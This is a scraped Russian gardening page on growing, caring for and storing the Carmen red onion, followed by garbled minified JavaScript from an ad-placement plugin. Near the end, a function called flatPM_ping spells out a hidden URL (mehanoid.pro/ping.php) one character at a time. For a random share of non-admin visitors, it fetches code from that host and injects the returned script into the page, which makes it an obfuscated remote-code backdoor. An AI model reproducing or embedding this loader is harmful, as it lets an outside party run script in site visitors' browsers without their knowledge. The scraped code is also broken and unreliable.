Под лук отводят хорошо освещаемые солнцем зоны огорода, где до этого росли такие культуры, как картофель, капуста, томаты, огурцы, фасоль. Грядки подготавливают с осени. На кислых почвах предварительно проводят известкование, лук любит нейтральную реакцию грунта. Под перекопку вносят перегной или компост. Весной добавляют золу или удобрения, содержащие P и К.

Идеальными для лука считаются легкие, влаго- и воздухопроницаемые грунты, по механическому составу — супеси или суглинки. Тяжелые глинистые почвы для выращивания растений не подходят. Их можно использовать только после дополнительной подготовки. Поможет внесение песка, опилок или других разрыхлителей. Не стоит рассчитывать на хороший урожай и на подтопляемых грунтовыми и талыми водами участках. Растения не любят излишнюю влажность у корней, при этом часто поражаются всевозможными болезнями.

Выращивание лука Кармен МС из семян начинают, как только почва прогреется минимум до 12 °C. В зависимости от региона это может быть апрель-май. Посев проводят на глубину 1-1,5 см во влажную почву. Между рядками оставляют 10-15 см. Когда луковые всходы появятся, посадки прореживают в 2-3 этапа. В конечном итоге между растениями должно оставаться 5-7 см.

Рассаду начинают выращивать за 2 месяца до предстоящего размещения на грядке. Для этого подготавливают плодородный грунт (или приобретают его в магазинах). Семена из пакетов от проверенных производителей можно не подготавливать. Но при сомнениях в их качестве и для получения более дружных всходов, чернушку дезинфицируют в растворах фунгицидов или марганцовке. Замачивают перед посадкой в стимуляторах роста или оставляют в мокрой ткани. Высевают семена по 1 шт. в неглубокие ящички или кассеты с мелкими ячейками на глубину 1-1,5 см.

Держат рассаду лука на хорошо освещенном подоконнике, поливают по мере подсыхания грунта. Подкормку проводят 2-3 раза комплексными препаратами с микроэлементами и стимуляторами роста. За 2 недели до пересадки на грядку проводят закаливание. Высаживают растения с интервалом в ряду 5-7 см и междурядьем, как при посеве семян. Прореживание при этом не проводят.

Уход за луком заключается в рыхлении земли, прополке сорняков, поливах и внесении удобрений. За 2-3 недели до уборки орошение прекращают. Выкапывают севок после полегания и засыхания ботвы. Далее луковицы осматривают, удаляют больные и порченые экземпляры. Здоровый севок подготавливают к хранению. Его выдерживают 2-3 недели при температуре 25-30 °C, периодически переворачивая. После просушки луковицы держат в сетках, коробках, ящиках при температуре 18-25 °C.

Подзимний посев лука севка Кармен МС проводят в октябре или ноябре, в одно время с чесноком, при температуре около +5 °C. Для этого отбирают крепкие, не проросшие луковички диаметром до 1 см. Их протравливают в марганцовке или фунгицидах, а затем просушивают. Высаживают севок по схеме: 20 см между рядами луковиц и 5-10 см между самими луковичками в ряду. Посадочный материал заглубляют в почву на 4-6 см выше шейки. Борозды присыпают свежим торфом либо грунтом. Грядки укрывают мульчей.

До наступления морозов лук не должен прорасти. В противном случае растения плохо перенесут зиму.

Весной используют более крупный севок – до 2 см. Придерживаются тех же сроков, что для посева семян. Луковицы углубляют на 2-3 см от шейки, по той же схеме, что и осенью. Если севок хранился в теплом помещении, его перед размещением на грядке не прогревают. Материал просто дезинфицируют, а также замачивают в стимуляторах роста. Чтобы зелень появилась раньше, используют временные укрытия.

Поливают лук в среднем 1 раз в неделю. После этой процедуры почву в междурядьях обязательно рыхлят, чтобы не образовывалась корка. Минимум 3 раза за сезон вносят комплексные минеральные удобрения. За 3 недели до уборки прекращают подкормки и орошение.

Уборку лука Кармен МС начинают в июле, основной период приходится на август, в некоторых регионах – начало сентября. Все зависит от климатических условий и времени посадки. Репку, выросшую из севка подзимней посадки, выкапывают раньше.

В сухую солнечную погоду урожай после уборки оставляют просушиваться на грядках. Затем обрезают перо и часть корней. Если такой возможности нет, например, в дождливую погоду, то процедуру проводят в сараях или на чердаках с хорошей вентиляцией. Держат лук в сетках, ящиках, картонных коробках.

Хранение урожая может происходить холодным, теплым или комбинированным способом. Чтобы репка долго не портилась, ей необходима температура 1-3 °С или 18-22 °С и влажность 60-80%.

Отзывы овощеводов

Отзывы огородников о красном луке Кармен МС позволяют составить свое мнение об этом овоще.

Луковый сорт Кармен: характеристики, посадка и уход

Среди большого количества сортов лука своей сладостью и не капризностью выделяется сорт Кармен, который является результатом деятельности голландских селекционеров и уже не первый год занимает лидерские позиции в нашей стране. Лук Кармен неприхотлив в уходе, хорошо хранится и часто используется в кулинарии.

Общая характеристика сорта

Этот вид относится к среднеспелым сортам красного лука. Его выращивают на репку как однолетнюю культуру из семян и как двулетнюю – из лука-севка.

Описание внешнего вида

Кармен обладает следующими характеристиками:

  • форма – округло-плоская;
  • размеры луковицы – средние;
  • масса – от 50 до 70 г;
  • внешние, сухие чешуйки – фиолетового цвета, сочная чешуя – белая с фиолетовым оттенком;
  • высота перьев – до 30 см;
  • лук является двух- и трехзачатковым.

Урожайность и лёжкость

С одного квадратного метра участка можно собрать до 2,5 кг урожая. Кармен выращивают во всех регионах России, но наиболее подходят следующие:

  • Центральный;
  • Средневолжский;
  • Центрально-Черноземный.

В зависимости от климата и местности на созревание уходит от 65 до 90-100 дней с момента посадки. При наличии благоприятных условий урожай хранится до 8 месяцев.

Плюсы и минусы

Посадка и уход за этим сортом лука не представляет большой сложности, а сама культура обладает следующим списком достоинств и недостатков.

Достоинства:

  • имеет 100-процентный уровень вызреваемости;
  • содержит в себе большое количество полезных веществ;
  • характеризуется хорошей лежкостью;
  • устойчив к стрелкованию;
  • подходит для всех, даже северных регионов;
  • обладает сладким и душистым вкусом;
  • имеет иммунитет к заболеваниям.

Состав и свойства

Лук Кармен известен тем, что в своем составе содержит огромное количество полезных веществ и минералов:

  • соединения серы;
  • флавоноиды;
  • макроэлементы – кальций, натрий, калий и др.;
  • микроэлементы – селен, медь, фтор, железо;
  • витамины С, А, Е, группы В и т.д.

Выращивая подобный сорт у себя в огороде, вы получаете натуральное средство, которое помогает бороться с вирусными сезонными эпидемиями, повышая иммунитет.

Сферы применения

Вкус у Кармена – нежный, сладкий, мягкий и пикантный, а мякоть луковиц – сочная и хрустящая.

Кармен является салатным луком, но его лучше употреблять в свежем виде, а термической обработки избегать, чтобы по максимуму сохранить все полезные свойства.

Подготовка к посадке

Неприхотливость сорта совершенно не значит, что он не требует ухода. Посадку начинайте с выбора и подготовки места и почвы.

Подготовка почвы

Грядки должны располагаться на территории, которая хорошо освещается, где отсутствуют ветра. Кармен отдает предпочтение рыхлым питательным почвам с нейтральной или слабощелочной реакцией – чаще всего это черноземы, суглинки или супески.

Если почва тяжелая и глинистая, для большей рыхлости внесите органику и крупнозернистый песок, а если уровень кислотности повышенный, то произвесткуйте почву.

Также проследите, чтобы на выбранном месте отсутствовали затопления и застой воды, потому что это становится причиной гниения головок лука. Грядки готовят осенью путем уборки сорной травы, внесения компоста или навоза и перекапывания. За зиму почва впитываетвсе эти питательные вещества и делает её более плодородной.

Выбор и подготовка семенного материала

Семена можно купить в специализированных магазинах. В южных регионах их сажают сразу в открытый грунт, а на севере лучше выращивать сорт через рассаду.

Перед посевом семенной материал должен пройти определенную подготовку:

  • зерна замачивают в растворе марганцовки на полчаса;
  • замачивают семена в любом стимуляторе роста.

Далее положите посадочный материал во влажную ткань для проращивания, а спустя пару дней начинайте высеивать.

Технология посадки

Выращивание лука предусматривает несколько вариантов посадки. Каждый огородник выбирает для себя ту, которая наиболее подходит под его регион и климат.

В открытый грунт

Севок лука Кармен и рассаду сажают в мае, когда почва уже прогрета, но не пересохшая, с достаточным количеством влаги с ранней весны. От того, правильно ли вы выбрали грунт, зависит благополучное укоренение и развитие луковиц.

Инструкция посадки Кармена в почву выглядит следующим образом:

  1. В подготовленной почве сделайте бороздки или лунки.
  2. Полейте их водой.
  3. Севок заглубляйте на 4 см, но плечики сажайте плотно, чтобы не образовывались воздушные прослойки.
  4. Засыпьте землей на 2-3 см.
  5. Проработайте верхний слой почвы граблями.

Высадок сажайте, не заглубляя точку роста, а корешок прижимайте к влажной почве, присыпая землей. Луковый росток слегка вдавите в грунт и окончательно зафиксируйте землей.

Схема рассадки – 10*15 см. Иногда для большего удобства ширину между рядами делают на размер инвентаря – плоскореза или тяпки. Главное, чтобы она была не меньше длины ладони.

Посадка рассады и пересадка в открытый грунт

Для рассады нужен небольшой ящик – засыпьте в него земли примерно на 100 мм, прогрейте и полейте слабым раствором марганцовки, чтобы избавиться от вредных бактерий. После этого густо высейте чернушку и засыпьте сверху подготовленной землей. Выровняйте грунт ладошкой и полейте водой комнатной температуры.

Такую рассаду надо готовить к началу марта, чтобы семена успели проклюнуться и дать ростки к маю. Выращивайте семена на подоконнике, чтобы дневной солнечный свет прогревал землю.

Некоторые огородники накрывают ящик пленкой, чтобы получился парниковый эффект. Можно подсвечивать лампой, если солнечного света недостаточно.

После этих действий рассаду можно пересаживать в открытую почву. Если все выполнить верно, то она приживется без проблем:

  1. Перед тем, как пересаживать рассаду, перекопайте почву.
  2. После перекопки накройте землю пленкой, чтобы осуществлять высаживание в прогретую землю.
  3. Обильно полейте ту землю, в которой росла рассада, чтобы во время вытягивания перышки не отрывались от головки.
  4. Высаживать рассаду нужно на глубину в 30 мм, чтобы формирующаяся головка находилась не очень глубоко от поверхности земли.
  5. При росте растения не открывайте зеленые перья, чтобы головка лука сформировалась сильной и крупной.

Правила ухода

Чтобы растения хорошо росли, проводите своевременно все необходимые действия и соблюдайте агротехнические требования.

Подкормки

Выполняют процедуру несколько раз за сезон следующим образом:

  • спустя 2 недели с момента посадки вносят азотные удобрения (нитрофоска и мочевина) – 25 г мочевины или 30 г нитрофоски на ведро воды;
  • через 2 недели после первой подкормки луку добавляют фосфорно-калийные удобрения – 30 г суперфосфата/15 г калийной соли на 10 л воды;
  • через 15 дней повторяют фосфорно-калийную подкормку – 30 г суперфосфата и 15 г калийной соли.

После каждого внесения подкормки обильно поливайте почву. Обязательно смывайте остатки удобрений с луковых листочков при помощи теплой воды из лейки.

Полив

Проводят полив таким образом, чтобы почва не высохла, иначе саженцы завянут и засохнут. Поливают лук раз в неделю, но за 2-3 недели до предполагаемой даты уборки урожая его полностью прекращают, чтобы дать луку возможность дозреть в сухой почве.

Рыхление и прополка

На следующий день после полива проводят рыхление почвы. Землю рыхлят неглубоко, между рядами, стараясь не повредить луковицы.

Прополку проводят на протяжении всего роста растения. При посадке лука семенами сорная трава может остановить формирование головок, и урожая не будет. Так как стрелки при семенной посадке очень маленькие, проводите прополку максимально аккуратно, чтобы не повредить растения.

Борьба с болезнями и вредителями

Кармен подвергается нашествиям таких вредителей:

  1. Лукового скрытнохоботника. Этот жук откладывает в луке личинки, которые после вылупления едят листья растения. Борются с ним путём соблюдения севооборота, тщательной уборки урожая, зяблевой вспашки и уничтожения растительных остатков.
    Для борьбы подходит смесь золы с табачной пылью в соотношении 2:1. Также проводят обработку Карбофосом – раствор 0,6%. Нужно 100 мл раствора на 1 кв.м.
  2. Луковой мухи и моли. Поражают посадки со второй декады мая.Последствия «работы» мухи и моли видны не сразу, так как действуют насекомые в почве. Проблема становится заметной, когда листья лука увядают и сохнут. Бороться можно, осуществляя полив соленой водой (100 г на 3 л).
  3. Нематоды. Это семейство паразитирующих круглых червей. О том, что лук заражен, свидетельствует деформирование и засыхание зеленой массы, луковица становится рыхлой, трескается, после дождя на участке ощущается запах гнилого лука. Борются при помощи профилактических мер – правильный севооборот, отбор посевного материала, соблюдение правил хранения.

Из химических мер борьбы подходит Перкальцит – он уничтожает цисты нематоды с яйцами и находящихся в почве личинок. Препарат разбрасывают в сухую погоду на участке за 5-10 дней до посадки из расчета 200-300 г на 1 кв.м. и заделывают граблями на глубину 10-15 см.

Болезни, с которыми может столкнуться лук:

  1. Ложная мучнистая роса. Грибковая болезнь, которая зимует как на луковицах в хранилище, так и в почве. Пораженные стебли приобретают грязно-зеленый цвет, обвисают и отмирают. Как результат – луковица не успевает созреть, и уменьшается количество урожая.
    Для профилактики заболевания при высоте листьев в 10-12 см проводят опрыскивание Поликарбацином (40 г препарата на 10 л воды) или Арцеридом (30 г препарата на 10 л воды).
  2. Бактериальная гниль. С этой болезнью можно столкнуться при разрезании луковицы – среди здоровых чешуек вы заметите несколько мягких темных слоев. И чем дольше хранится овощ, тем сильнее и больше будет область поражения.
    Для профилактики перед посадкой проводят тщательный отбор луковиц, обрезая у них шейку с основанием на 0,5-1 см, чтобы были видны чешуи. Можно обработать почву препаратом Хом (40 г на 10 л воды, расходуя по 1 л на 10 кв.м.).
  3. Фузариоз. Грибковая болезнь, проявляющаяся увяданием и загниванием зеленых ростков во время вегетации и порозовением и размягчением донца во время хранения лука.
    Перед посевом севок обязательно замочите в фунгициде (Фундазол или Квадрис), а пораженные растения сжигайте, чтобы они не заразили остальных соседей. При появлении пятен эффективна обработка Хомом (40 г на 10 л).
  4. Желтая карликовость и мозаика. Возникают в результате нарушения условий посадки и ухода за всходами. Пораженные растения замедляются в росте, изменяют форму и цвет. Конкретного лечения не существует, только профилактические меры.

Таким образом, чтобы не допустить развития болезней, в первую очередь, соблюдайте меры профилактики:

  • следить за правилами севооборота;
  • сажать лук без загущения;
  • проводить обеззараживание семян, севка и грунта;
  • поливать без переувлажнения;
  • ликвидировать все растительные остатки с грядок;
  • регулярно пропалывать почву;
  • сажать растения, отпугивающие вредителей.

Сбор и хранение урожая

Собирайте лук Кармен в сухой солнечный день. Выдерните растение, предварительно подкопав его лопатой, если земля твердая, и укладывайте рядами. У репки подстригите корешки, оставляя хвостик в 3-4 см.

После сбора урожая, его подсушивают на грядке на протяжении 2-3 недель. Сушить нужно в солнечную погоду, и если начались дожди, растение необходимо спрятать под укрытие.

После того, как лук полностью высохнет, его очищают от лишней шелухи и ботвы. При хранении в косах оставляют около 30 см для плетения. Если лук хранится в ящиках, оставляют по 10 см ботвы. Хранят Кармен в сухом (влажность не должна превышать 70%) прохладном или теплом помещении:

  • холодное хранение – при температуре до 0 градусов;
  • теплое – при 20 градусах.
Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};